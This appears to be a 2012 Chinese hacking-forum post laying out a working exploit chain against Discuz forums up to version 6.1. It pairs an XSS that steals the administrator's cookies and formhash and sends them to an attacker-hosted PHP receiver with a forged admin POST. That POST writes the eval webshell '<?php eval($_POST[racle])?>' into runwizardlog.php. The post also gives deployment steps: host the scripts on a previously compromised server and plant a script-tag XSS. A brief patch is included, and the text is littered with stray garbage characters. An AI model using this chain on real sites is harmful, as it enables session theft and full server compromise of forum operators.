找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3550|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell
1 z% o* c& i- l* ]- E3 _9 M" [9 yBy racle @tian6.com$ g2 g  O. h0 ?0 t8 j* M
欢迎转帖.但请保留版权信息.' y7 Z7 S3 e. b  J
受影响版本iscuz<=6.1.0,gbk+utf+big5
6 P- U8 {5 v9 V- ^: Z" p3 u+ E: L2 U9 F# r
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.8 O  y. |( J5 y
! x* q% Z/ v/ v( F
8 ]6 u% A* h- u  Z
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706% D6 h/ P. C' V2 r
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.2 S2 M( E. w$ r7 K

$ i. B/ s0 q' a+ r9 E5 Q5 C/ t分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
3 q9 \# i% o" n6 {! S本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS+ l4 N1 z& J- Y/ s- Z& k
* M9 r( G( y) q* Y8 F

1 l7 a. ~9 {  U! q5 Q! A$ j----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
. b  d. X6 D) I# c! [" s1 r' z* G( }# `  A* [" N
/ Z4 [9 O% g. q
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.9 ?6 U! [, _% l

2 Y4 T, U0 J% Q# uproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.$ X3 m8 O9 w8 v* O: F" O

* i. t* C* W+ H! bproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
; Y& j' m) B' c( s: c5 L$ d, U0 X; Q4 c
* _  o* I2 M! d) t: V
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
7 n9 U1 d; U( H8 G0 t9 l2 ~2 n- Z, P* U8 U& ]) j/ @% O6 m
        global $runwizardfile, $runwizardhistory;. N6 C3 x, S% x2 O

+ r" \0 i* \  c/ P- G, k        $fp = fopen($runwizardfile, 'w');) L5 _9 f1 C. [
% Q& F+ E. z5 f8 }
        fwrite($fp, serialize($runwizardhistory));
$ t! ^( ?8 m* o2 M7 d2 [! r
. x( W. b4 D$ J! i4 U" o& ?  _: f        fclose($fp);
# |6 k  ]1 {, r( t! @2 I! M
1 O% s7 J+ m4 g; h9 _' D}
" y; x0 m# g3 k2 ^复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
- U7 t4 ~& e4 n以下是修补的办法:function saverunwizardhistory() {
6 G; n% h* s# h- G" X; j4 _2 ^% j- _+ X: E
        global $runwizardfile, $runwizardhistory;7 L+ E2 \4 F8 _4 e5 j
' l3 s9 C' h% n
        $fp = fopen($runwizardfile, 'w');# k8 Y1 ?+ H& e
& k2 j9 x% N9 F+ g8 V6 R+ ~
        $s = '<?php exit;?>';
* a) I# W+ a3 X8 k5 y# p, U1 R( N4 ]4 ]# g5 X
        $s .= serialize($runwizardhistory);
$ M- X% N3 `$ q" E4 N" K
9 h- b" z" U& G1 y1 j) g+ l        fwrite($fp, $s);  z- R% T5 c4 f9 i- i. d% p

' z( o: j, `! K; ]5 s2 V# `7 g2 s8 ^        fclose($fp);  D0 |, Z9 }6 \( h: w

+ d4 t& {; Z/ S}
$ m9 U+ D" a6 o$ ?# m2 Y% L复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
5 g' q/ J, S9 m( B7 c; u6 `% |% e0 Q
! j" \. V) G2 I* [0 z& Q, u' j! a/ z& Y* \
; ~% \% m/ l. G8 |
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
! l8 j3 e; W9 u! V/ Y7 ~' q1 D. e9 ]' e; W1 M. y0 C
& e  s; t4 d1 V
  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
! u, \8 r/ q& v8 |% k9 h9 f2 b$ t8 J/ X7 H8 w/ `2 }
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
+ |  p3 Z$ [( m( X
4 d# b' P, {- d+ d; @这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.. P- f3 L" A9 j" Y" i  R

+ a5 m: N- |6 p, f5 r3 l8 `首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
' @2 q' I$ R/ `9 Z" Z. B8 B: j; r9 S5 u9 u" @% d; h" x7 d; m
var url="http://目标网站/admincp.php";      
, `* H* `8 Z/ h0 ~' n
6 C- C6 t( D, @& @0 o5 q/*获得cookies*/" A% {9 L$ b2 p1 q, _2 m  M$ o
0 h, d, ]3 @5 w" J; z1 j/ W
function getURL(s) {! ~/ H5 H1 [: b
% W$ N+ f# t" I) A
var image = new Image();
$ Y3 X; V  {# U) p1 a! c" K* q3 ?( W: t+ w- Q9 }
image.style.width = 0;4 X3 k, G4 y% e+ I! [
; [& c& n. [9 n3 ]5 w: p+ ~
image.style.height = 0;% w0 l( L+ d5 @. G& ~$ ]

) I4 o' w5 {: K' L) s- G! iimage.src = s;
2 o7 ]' G3 d; k& K" X5 D2 n5 A, l) i  ^# D! c) N
}7 e& v$ }* M% r

& n9 ?3 Z1 U5 g6 l$ H/ r4 zgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
  D* _" y( L8 j6 [9 X复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
7 S/ B1 R4 B/ T$ d% O- Z2 F  i复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
: ]) i$ |. M* d+ y- ]% [4 u4 a  h  n, i  s% L/ `
: `! K1 N" v3 i$ s3 i0 G0 l6 Q( {
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";2 |5 I7 J5 S* O

2 w( D, ?' a/ X9 J0 f
; O* U* w6 f) c1 h2 @: |8 r
6 T; G% E$ w9 d8 n: T/ \2 \/*hash*/) {# U" d9 V5 M0 J8 Y; c* L/ b9 u4 E

9 k' g, b1 ?4 bvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");& N. S0 C4 Y. f/ k$ l
1 i; ~7 K  l; g9 p! y2 q: Q
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);" @# n6 F1 M" ~/ j- N1 W
( E7 l& l4 v0 [# c
xmlHttpReq.send();2 l0 c1 F' P$ U- R/ H  D
# \8 b- m7 ?! G& V2 k9 U. T
var resource = xmlHttpReq.responseText;
3 R" m% _' C; I8 d
% ^, B4 p+ U/ ~: k- K$ c/ K8 J+ wvar numero = resource.search(/formhash/);
& n4 V# F2 g$ d" E1 @3 q
, v. p8 W6 ~+ R  `- J! h! Ivar formhash=encodeURIComponent(resource.substr(numero+17,8));' [1 }' ]! i; P( f& e  F1 f

' l: r; d; }4 h: P2 X" F3 D( u) u" G% X& E2 Z+ D7 f
- v1 Y( e0 b; h5 X1 z+ c, ]" C3 H$ `
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
. `0 [+ `4 r2 \" |" M  `. `/ c) x
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 - W/ s8 {- D8 ]
$ v% H" O; e7 j6 p: N
xmlHttpReq.setRequestHeader("Referer", url);
0 M& m+ I3 y% f' g) b, p3 \* n3 J' P
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");& m) H$ @1 j+ ~( d9 F4 B
" Z: r& u- R3 e1 }
xmlHttpReq.setrequestheader("content-length",post.length);
# g& n. h  T8 }) e  B- z
  W" M1 J" N( |% g) |2 f9 ^+ wxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); 9 v3 r4 }* g; d/ e7 b% {

/ L! J8 Q6 i2 |7 WxmlHttpReq.send(post);//发送数据
' R7 p9 V7 V' _9 n复制代码这里HASH我假设正确,这样提交,也无须cookies
' x! t2 d" x; k; r7 e8 b
6 |+ _% k( G, j! T) e8 U再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
$ X  B$ h* Y. b+ H
2 n$ G9 X$ d4 b6 oif (!$sock) die("$errstr ($errno)\n");8 ?2 ]4 Q( a5 |% V

8 L3 x  @  F2 O# {$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
4 X( Q* K+ O$ _( x' B: H
8 E! v" A- f7 }$ i! g2 g3 }: W- a( a& l4 e2 C" f2 v# ~+ r
; J( Z$ E8 d4 B4 M8 \# y
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");4 O$ l% r4 `- `
" z4 e' \, z& T9 u6 d
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");" Q, K8 ^0 {( `/ d

; C1 ^3 Q3 @+ h( i8 K2 J; m, [fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
) J7 V. ]( y6 L$ A5 Q6 z  ]8 o& T" e% _3 f# C8 B
fwrite($sock, "Accept-Language: zh-cn\r\n");5 Y. e+ A: M; G7 N

- x2 G1 R  H( a- Y" q' A) F  n! C( C: mfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");# c7 \: ^/ ?# L4 }2 e( V+ ^

3 H- Z  B( I& a$ ?fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");% y) y- ~. V5 v' y0 }

2 v; L- Z3 w4 P3 t: V. M, {# l' {* hfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");7 q" I6 Y1 r0 x0 u

3 s4 Y" u# P, T9 w; ~/ `fwrite($sock, "Host: $url\r\n");( H, u" L  b: @) g& {8 Y* K: f$ T8 @& m1 R
2 I$ [* B& K) r- q
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");5 {4 C- ^1 t, _2 j2 P

7 O# {  \9 k3 c3 C8 U8 H) u1 B# hfwrite($sock, "Connection: Keep-Alive\r\n");
# u. Y1 i, @6 Z, m! [' U: l" P5 O8 `5 V% o8 Q7 a+ b# a' R
fwrite($sock, "Cache-Control: no-cache\r\n");
) z% @' I  P4 }% A6 T/ k
- f+ q1 V8 X+ C+ s% afwrite($sock, "Cookie:".$cookies."\r\n\r\n");
# ~4 w- X* d3 }1 {& j
& {5 f# h4 `7 X# k8 Z) G; y8 \fwrite($sock, $data);
* [5 c8 t  y2 }! H1 R- |, j* r& n' ~  \+ d) n
7 e' J2 E2 ~, E  V/ q6 v
1 E6 B9 W, A( {. i: R3 W" n
$headers = "";
  c  B7 l0 N2 B+ x( J( P! T9 [) k) m& O# X
while ($str = trim(fgets($sock, 4096)))( n: O0 l# X  K9 N7 `
! h9 p7 n6 l* S8 J
     $headers .= "$str\n";2 v  _' X) }0 s2 ?9 x
% c4 _, s4 e7 q: Y. \3 b8 ]
echo "\n";; U$ u7 t1 m$ L, h* K. o0 G% g
' x+ ]& Q2 j. O$ Y" u  [
$body = "";
  i/ ^/ R, R& V4 x0 N) T" t6 H# t/ p8 A+ M- p3 w: N2 c  P! i
while (!feof($sock))
; I3 a  A! E! c; Z8 n) j
  b" y) U/ O' \! x( x0 p; V0 u     $body .= fgets($sock, 4096);9 U, g* L# H; A: M. n

! r$ ?) X! R& b7 S/ \fclose($sock);
4 n8 d) c2 J! X+ P& w) n: d; w) W1 {
echo $body;( l/ R' ^- {7 ]: L2 v5 W
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
/ t+ K' I  H" \/ v) e7 Q
4 m. \. X# ^3 y  {( [* _! S: W) I1 T7 i: \1 P
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
2 |& C: n) ]. v1 \. Y
4 I7 k6 Z1 f1 |5 k9 {3 Q" j0 g
: \+ Q! g7 v% G; |4 O5 q* ~1HP SOCKET利用方法首先打开racle.js
3 _; b1 g& j; G8 A9 }' l5 E
6 r8 A  \  E. ]8 c7 }4 ]7 Nvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home% s' T" d$ |+ E. W
, u) n6 U2 z% `0 Q

6 j1 s& S' w7 u1 y3 y4 G" b( w
2 Z, q" v* C9 a/ A  h) i! d然后打开racle@tian6.php7 q. `% `# W( L% \. y
2 w- S$ n3 O4 V0 I
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
! d7 h! r  M4 i- D8 X" l( U! v  E; _% A

0 T: u3 [2 b; h. }2 u/ N8 r9 E
- V/ g0 x: t$ q: d: V如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:8 S, R7 R5 N: f
  t( e: m5 Y1 Z6 U7 p; ^
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
: M$ S7 `( [1 E3 x5 }; T' n. ]% W
: U7 r2 C+ i, n4 y+ [; ^2 M9 ~/ V) m% L! \: U- i2 N
, v# _' |+ `+ `( d1 A8 c
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
8 Z4 {/ t6 l0 F6 r- ]- {复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.3 y7 w  A4 z/ N1 B& v* u8 ^

% s1 i5 H5 S9 ?. c3 Y9 J) g9 ]
( ]. |# E  z& K# D( B
$ v. l& ^8 R5 B! D如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
; z5 I* J9 ]+ z: Q, F# _
' a5 o& y% P5 T& q( c  z. Y2 Ovar formhash=encodeURIComponent(resource.substr(numero+17,8));
% [# h& }& C+ W( e  [/ Z- ?* K5 c8 J) b( O
, s) P* H  H' n% e- T# N. d
& Z8 H* i- Z9 j% I4 P  ]
var formhash=encodeURIComponent(resource.substr(numero+9,8));* `  G# C" F/ ~- I  t. i- g
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
: W/ R* [$ b0 T2 m4 w  ~: W# v9 W
. j- {; E, ]# d' \" f1 e  A如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
& s6 O6 E  t+ I
3 d" A' t7 ]0 q! |% x: Z如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
% c  o% p% v4 [- \9 V- F  M; e! F% [: r  C$ s
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
8 G5 L: Z5 p7 ?9 k8 F
) R. D7 v8 M# R$ O" H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表